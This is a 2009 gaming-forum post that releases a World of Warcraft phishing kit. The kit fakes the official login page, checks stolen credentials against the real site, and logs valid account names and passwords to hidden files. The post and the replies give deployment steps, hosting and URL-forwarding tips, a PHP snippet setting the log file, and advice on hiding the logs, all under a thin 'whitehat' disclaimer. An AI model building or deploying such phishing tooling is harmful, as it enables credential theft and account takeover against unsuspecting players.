WoW ScamsWorld of Warcraft Whitehat Scamming Methods ONLY.
[NO QUESTIONS HERE] We do not condone scamming, this section is meant for people to read about scamming so they can prevent being scammed themselves.
[Release][Phisher] New Login With Checking Functionality
Please Read: Some have said the dowload link doesnt work, if you have issues downloading please leave a comment. What site can i host it on for free if the download doesnt work?
Introduction: I personally am not much into scamming but i thought it would be interresting to see if i could make a phisher which used Apoc's checking function, because Drakke's is for the old EU page, and the EU login has been updated. I have found that it takes a very long time to login if the account is valid, but if it is invalid then it will be quick. I'm just trying to contribute, and this is the first relatively large thing I've contributed, so i hope you enjoy!
Installation: Just extract the file to a convenient place, such as your desktop, and up load the files in the organasation that they are in in the folder. The hosting site that you upload them to must have cURL enabled, such as [Only registered and activated users can see links. ], but i just saw that the pages they host have ads. You may also want to us a co.nr url forwarding service, because I've found that co.cc hasn't been working for me.
EDIT: I just found that [Only registered and activated users can see links. ] is just like 50gigs.net but has no adds.
What I've done: I have used a veriety of differnt phishers and combined them to create a phisher that looks like the new login page and also checks the accounts. I have also included a Emerald Dream version, also with checking function, for all you Emerald Dream phishers. The Phisher uses Apoc's OLD checker, I will attempt to get it to work with the new one (posted about a day ago), and update.
Drakke has Explained Nicely Here How to Change Your Info Logs: UPDATE: Because of Apoc's update of the "accountverification.php" file when you change the name of your "accinflog.html" (the file that holds account names and passwords), you must go into "accountverification.php", which can simply be opened in word, and change "accinflog.htm" to your new name.
Code:
<?php
/*
Account check engine by Apoc@MMOwned
*/
// Edit this to whatever you want it to be on your web server. You can use a relative, or exact path if you want.
// Eg; /home/user/public_html/logs/log.txt/
// Or; ./log.txt
// You are free to name it whatever you want.
define('LOG_FILE', './accinflog.html');
Quote:
Originally Posted by Drakke
There are 2 html pages by standard set as log files. One of the files is the log for the login screen and one for the verification page itself.
/accinflog.html - This is where the account name and password from the login page is logged to. These are never wrong when entered as they're checked by the official (EU) wow side.
/totalinfolog.html - This is where all the account info that the user enters after logging in goes to. This information is unchecked and the user can write whatever he wants in the fields, but hey - he already checked if the login screen was a fake hopefully, and hopefully he won't question the next page
Leave a reply telling me what you think! Normal New Wow Login (Sorry for Image Size): Emerald Dream Login, Idea By jimei (Sorry for Image Size):
Also if you want this type of phisher without the checking function, because it causes phishers to take a long time, just PM me.
Credits: Drakke For the original EU checking phisher [Only registered and activated users can see links. ] cXm0d For the original US phisher [Only registered and activated users can see links. ] Moji For the original EU phisher [Only registered and activated users can see links. ] Apoc For the checking fuctionality script [Only registered and activated users can see links. ] jimei For the idea for the Emerald Dream Phisher [Only registered and activated users can see links. ]
If You Download Please Leave a Comment.
~Oppochaos~
__________________
Last edited by Oppochaos; 05-30-2009 at 04:29 PM.
Donate to remove ads, get your "DONATOR title, and get access to the MMOwned community's elite Shoutbawx.
Nothing. The log.txt does nothing lol, i just didnt take it out. The same goes for all of the info logs, do nothing to them, (except change their name)
Read the quote under "Drakke has Explained Nicely Here How to Change Your Info Logs:"
It tells you how to change the name of your info logs, so it isnt the default location so people cant steal your accounts.
Sorry i may have comfused you be saying that last part about "except change their name"
for example:
your account names and passwords go into "accinflog.html"
you change the name of that to "whatever you want.html"
go into engine.php and change "accinflog.html" to "whatever you want.html"
Then change "totalinfolog.html" to "whatever you want number two.html"
then go into wowengine.php and change "totalinfolog.html" to "whatever you want number two.html"